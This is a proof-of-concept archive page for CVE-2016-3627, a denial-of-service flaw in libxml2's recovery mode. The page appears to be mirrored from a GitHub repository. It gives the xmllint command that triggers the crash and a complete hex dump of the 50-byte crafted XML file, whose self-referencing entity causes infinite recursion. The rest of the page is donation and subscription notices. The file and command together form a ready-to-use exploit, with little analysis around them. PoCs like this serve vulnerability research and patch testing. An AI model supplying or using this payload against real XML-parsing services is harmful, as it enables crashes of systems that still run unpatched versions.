Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2016-3627 PoC — Libxml2 拒绝服务漏洞

Source
https://github.com/Oneton429/CVE-2016-3627
Associated Vulnerability
Title:Libxml2 拒绝服务漏洞 (CVE-2016-3627)
Description:The xmlStringGetNodeList function in tree.c in libxml2 2.9.3 and earlier, when used in recovery mode, allows context-dependent attackers to cause a denial of service (infinite recursion, stack consumption, and application crash) via a crafted XML document.
Description
PoC of CVE-2016-3627
Readme
# [CVE-2016-3627](https://www.cve.org/CVERecord?id=CVE-2016-3627)

Usage: `xmllint --valid --recover CVE-2016-3627.xml`

```shell
> xxd CVE-2016-3627.xml
00000000: 3c21 444f 4354 5950 455b 3c21 454e 5449  <!DOCTYPE[<!ENTI
00000010: 5459 594e 2726 594e 3b27 3e3c 2145 4e54  TYYN'&YN;'><!ENT
00000020: 4954 5968 3e30 3cef bfbd 2053 3d22 2659  ITYh>0<... S="&Y
00000030: 4e3b                                     N;
```
File Snapshot

 [4.0K]  /data/pocs/d39650341d41b594ededec4958916b616e727d2b
├── [  50]  CVE-2016-3627.xml
└── [ 416]  README.md

1 directory, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →